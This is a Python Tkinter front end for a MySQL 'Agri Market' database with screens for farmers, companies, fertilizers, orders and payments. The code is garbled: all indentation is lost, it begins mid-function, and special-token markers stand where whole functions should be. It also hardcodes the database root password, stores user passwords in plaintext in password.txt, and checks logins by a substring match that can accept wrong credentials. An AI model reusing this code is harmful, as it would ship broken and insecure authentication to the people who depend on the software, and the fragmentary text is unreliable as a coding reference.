l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)
Button.place(x=300, y=400)
def update_fe():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Fertlizer formula', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=10)
label = Label(root, text='Fertlizer name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Fertlizer content', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Fertlizer price', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='comapny_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_fe)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_fer()
<|reserved_special_token_0|>
def search_fer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Fertlizer formula:', font=('Times new roman',
20), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
fertilizer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_fe)
Button.place(x=400, y=400)
def search_fe():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=
fertilizer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['fertilizer formula: ', 'fertilizer name: ',
'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Fertilizer formula', font=(
'times new roman', 15))
l.place(x=100, y=300)
search_fer()
def orders():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Orders Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_ord)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_ord)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_ord)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_ord)
Button.place(x=410, y=50)
view_ord()
def view_ord():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',
'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand
=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('or_id', text='Order Id')
table.heading('or_date', text='Order Date')
table.heading('or_fid', text='Ordered Farmer Id')
table.heading('or_formula', text='Order (item)formula')
table.heading('or_to', text='Order to')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM orders;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_ord():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Order date', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=60)
label = Label(root, text='Order FID', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e2.insert(0, datetime.now())
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_ord_command)
Button.place(x=400, y=400)
def insert_ord_command():
try:
sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
orders()
except:
insert_ord()
def delete_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_ord_command)
Button.place(x=400, y=400)
def delete_ord_command():
try:
sql = 'DELETE FROM orders WHERE or_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
orders()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_or():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM orders WHERE or_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Order Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Order Date', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Order f_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Order formula', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Order to', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_ord)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Order_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_ord()
def update_command_ord():
sql = (
'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
orders()
def search_ord():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=
'tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_or)
Button.place(x=400, y=400)
def search_or():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM orders WHERE or_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['order Id: ', 'Order date: ', 'Order fid: ',
'Order formula: ', 'order to: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid order id', font=('times new roman', 15))
l.place(x=100, y=300)
search_ord()
def payment():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Payment Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_pay)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_pay)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_pay)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pay)
Button.place(x=410, y=50)
view_pay()
def view_pay():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
cur.execute('SELECT * FROM payment;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_pay():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Transaction farmer id', font=(
'Times new roman', 20), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Transaction date', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Transaction amount', font=('Times new roman',
20), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Transaction method', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e3.insert(0, datetime.now())
e4.place(x=350, y=160)
e5 = StringVar(root)
e5.set('Debit card')
w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')
w.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_pay_command)
Button.place(x=400, y=400)
def insert_pay_command():
try:
sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
cur.executemany(sql, [vals])
db.commit()
payment()
except:
insert_pay()
def delete_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_pay_command)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
def search_pay():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Transaction Id:', font=('Times new roman', 20
), bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_pa)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def First_page(root):
global T1, T2, T3
frame = Frame(root, height=500, width=800, bg='ivory')
frame.pack()
label = Label(root, text='WELCOME TO AGRI MARKET', font=(
'Times new roman', 25))
label.place(x=200, y=50)
button = Button(root, text='LogIn', font=('times new roman', 20),
command=check_pass, bg='green')
button.place(x=350, y=350)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=280, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=280, y=250)
reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=
'blue', command=create_pass)
reg_button.place(x=340, y=400)
def check_pass():
global root, T1, T2, T3
try:
with open('password.txt', 'r') as f:
lines = f.read()
if T1.get() + '=' + T2.get() in lines and T1.get(
) != '' and T2.get() != '':
entity_page()
else:
label = Label(root, text=
'Invalid username or password.Try again', font=(
'times new roman', 15))
label.place(x=200, y=100)
except:
label = Label(root, text='Invalid username or password.Try again',
font=('times new roman', 15))
label.place(x=200, y=100)
def create_pass():
global root, T1, T2, T3
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
L1.place(x=150, y=200)
T1 = tk.Entry(root, width=30, bd=5)
T1.place(x=380, y=200)
L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
L2.place(x=150, y=250)
T2 = tk.Entry(root, width=30, show='*', bd=5)
T2.place(x=380, y=250)
L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),
bg='ivory')
L2.place(x=150, y=300)
T3 = tk.Entry(root, width=30, show='*', bd=5)
T3.place(x=380, y=300)
reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=
'blue', command=add_pass)
reg_button.place(x=440, y=400)
def add_pass():
global root, T1, T2, T3
if T2.get() != T3.get():
label = Label(root, text='Incorrect Password. Enter again', font=(
'times new roman', 20))
label.place(x=100, y=100)
else:
try:
with open('password.txt', 'r') as f:
data = f.read()
with open('password.txt', 'w') as f:
f.write(data + '\n')
f.write(T1.get() + '=' + T2.get())
entity_page()
except:
with open('password.txt', 'w') as f:
f.write(T1.get() + '=' + T2.get())
entity_page()
def entity_page():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'ivory')
label.place(x=0, y=0)
label = Label(root, text='WELCOME TO AGRI MARKET ', font=(
'Times new roman', 20), bg='blue')
label.place(x=200, y=20)
label = Label(root, text='Choose the Entity ', font=('Times new roman',
20), bg='white')
label.place(x=250, y=100)
Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer
)
Button.place(x=100, y=150 + 25)
Button = tk.Button(root, text='Company', font=('Arial', 15), command=
company)
Button.place(x=300, y=150 + 25)
Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command
=fertilizer)
Button.place(x=500, y=150 + 25)
Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)
Button.place(x=200, y=300 + 25)
Button = tk.Button(root, text='Payment', font=('Arial', 15), command=
payment)
Button.place(x=400, y=300 + 25)
Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),
command=history)
Button.place(x=200, y=400 + 25)
def history():
global root, cur, db
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
data = cur.fetchall()
label = Label(root, text='The Transaction History of this month', font=
('Arial', 15))
label.place(x=200, y=20)
button = Button(root, text='BACK', command=entity_page)
button.place(x=20, y=20)
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('trans_id', text='Transaction Id')
table.heading('p_f_id', text='Farmer Id')
table.heading('p_date', text='Payment Date')
table.heading('p_amount', text='Amount')
table.heading('p_method', text='Payment Method')
table['show'] = 'headings'
table.pack()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
db.close()
db = mysql.connector.connect(host='localhost', user='root', passwd=
'bhushi', database='farmer_app')
cur = db.cursor()
def farmer():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_farmer)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_farmer)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_farmer)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_farmer)
Button.place(x=410, y=50)
view_farmer()
def view_farmer():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',
'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,
yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('f_id', text='Farmer Id')
table.heading('f_name', text='Farmer Name')
table.heading('f_phone', text='Farmer Phone')
table.heading('f_mail', text='Farmer Mail')
table.heading('f_locality', text='Farmer Locality')
table.heading('f_address', text='Farmer Address')
table['show'] = 'headings'
table.column('f_id', width=100)
table.pack()
cur.execute('SELECT * FROM farmer;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_farmer():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=
'white')
label.place(x=50, y=10)
label = Label(root, text='Farmer_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=60)
label = Label(root, text='Farmer_phone', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Farmer_mail', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=160)
label = Label(root, text='Farmer_locality', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
label = Label(root, text='Farmer_address', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=270)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e4 = Entry(root, width=50)
e5 = Entry(root, width=50)
e6 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
e6.place(x=350, y=270)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_farmer_command)
Button.place(x=400, y=400)
<|reserved_special_token_0|>
def invalid(page):
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
if page == 'farmer':
label = Label(root, text='Enter valid farmer_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_farmer)
button.place(x=300, y=400)
elif page == 'company':
label = Label(root, text='Enter valid company_id', font=(
'Times new roman', 30), bg='white')
label.place(x=170, y=200)
button = Button(root, text='Re-enter', font=('Times new roman', 20),
command=insert_company)
button.place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
try:
sql = 'DELETE FROM farmer WHERE f_id=%s;'
cur.execute(sql, [e1.get()])
db.commit()
farmer()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
def update_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)
Button.place(x=300, y=400)
def update():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM farmer WHERE f_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Farmer_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Farmer_name', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=60)
label = Label(root, text='Farmer_phone', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Farmer_mail', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=160)
label = Label(root, text='Farmer_locality', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
label = Label(root, text='Farmer_address', font=('Times new roman',
20), bg='white')
label.place(x=50, y=270)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
e4 = Entry(root)
e5 = Entry(root)
e6 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3, e4, e5, e6]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=60)
e3.place(x=350, y=110)
e4.place(x=350, y=160)
e5.place(x=350, y=210)
e6.place(x=350, y=270)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command)
label.place(x=300, y=400)
except:
l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
l.place(x=100, y=300)
update_farmer()
def update_command():
try:
sql = (
'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
)
vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
cur.executemany(sql, [vals])
db.commit()
farmer()
except:
update_farmer()
def search_farmer():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg
='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)
Button.place(x=400, y=400)
def search():
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
try:
sql = 'SELECT * FROM farmer WHERE f_id=%s;'
val = [e1.get()]
cur.execute(sql, val)
Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)
Button.place(x=300, y=400)
for val in cur:
count = 0
Y = 50
names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
'farmer mail: ', 'farmer locality: ', 'farmer address: ']
for i in val:
label = Label(root, text=names[count] + str(i), font=(
'Times new roman', 20), bg='tomato')
label.place(x=10, y=Y)
Y += 50
count += 1
db.commit()
except:
l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
l.place(x=100, y=300)
search_farmer()
def company():
global root
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Table', font=('Times new roman', 15),
bg='white')
label.place(x=350, y=10)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=
entity_page)
Button.place(x=10, y=50)
Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
insert_company)
Button.place(x=110, y=50)
Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
delete_company)
Button.place(x=210, y=50)
Button = tk.Button(root, text='Update', font=('Arial', 15), command=
update_company)
Button.place(x=310, y=50)
Button = tk.Button(root, text='Search', font=('Arial', 15), command=
search_company)
Button.place(x=410, y=50)
view_company()
def view_company():
frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
frame.place(x=10, y=100, width=750, height=400)
x_scroll = Scrollbar(frame, orient=HORIZONTAL)
y_scroll = Scrollbar(frame, orient=VERTICAL)
table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),
xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
x_scroll.pack(side=BOTTOM, fill=X)
y_scroll.pack(side=RIGHT, fill=Y)
x_scroll.config(command=table.xview)
y_scroll.config(command=table.yview)
table.heading('c_id', text='Company Id')
table.heading('c_name', text='Company Name')
table.heading('c_address', text='Company Address')
table['show'] = 'headings'
table.column('c_id', width=100)
table.pack()
cur.execute('SELECT * FROM company;')
data = cur.fetchall()
db.commit()
if len(data) != 0:
for row in data:
table.insert('', END, values=row)
def insert_company():
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company_id', font=('Times new roman', 20), bg
='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman', 20
), bg='white')
label.place(x=50, y=210)
e1 = Entry(root, width=50)
e2 = Entry(root, width=50)
e3 = Entry(root, width=50)
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
insert_company_command)
Button.place(x=400, y=400)
def insert_company_command():
try:
if len(e1.get()) > 3:
invalid('company')
else:
sql = 'INSERT INTO company values(%s,%s,%s);'
vals = e1.get(), e2.get(), e3.get()
cur.executemany(sql, [vals])
db.commit()
company()
except:
insert_company()
def delete_company():
global e1
label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
'tomato')
label.place(x=0, y=0)
label = Label(root, text='Company Id:', font=('Times new roman', 20),
bg='tomato')
label.place(x=100, y=200)
e1 = Entry(root, width=50)
e1.place(x=300, y=200)
Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)
Button.place(x=200, y=400)
Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
delete_company_command)
Button.place(x=400, y=400)
def delete_company_command():
try:
sql = 'DELETE FROM company WHERE c_id=%s;'
cur.execute(sql, [int(e1.get())])
db.commit()
company()
except:
l = Label(root, text='Invalid Entry', font=('times new roman', 15))
l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
try:
global e1, e2, e3, e4, e5, e6
label = Label(root, text=' ' * 800, font=('Times new roman', 500),
bg='tomato')
label.place(x=0, y=0)
sql = 'SELECT * FROM company WHERE c_id=%s;'
vals = [e1.get()]
cur.execute(sql, vals)
label = Label(root, text='Company_id', font=('Times new roman', 20),
bg='white')
label.place(x=50, y=10)
label = Label(root, text='Company_name', font=('Times new roman',
20), bg='white')
label.place(x=50, y=110)
label = Label(root, text='Company_address', font=('Times new roman',
20), bg='white')
label.place(x=50, y=210)
e1 = Entry(root)
e2 = Entry(root)
e3 = Entry(root)
data = cur.fetchall()
arr = [e1, e2, e3]
count = 0
for val in data[0]:
arr[count].insert(0, val)
count += 1
e1.place(x=350, y=10)
e2.place(x=350, y=110)
e3.place(x=350, y=210)
label = Button(root, text='Modify', font=('Times new roman', 20),
bg='blue', command=update_command_c)
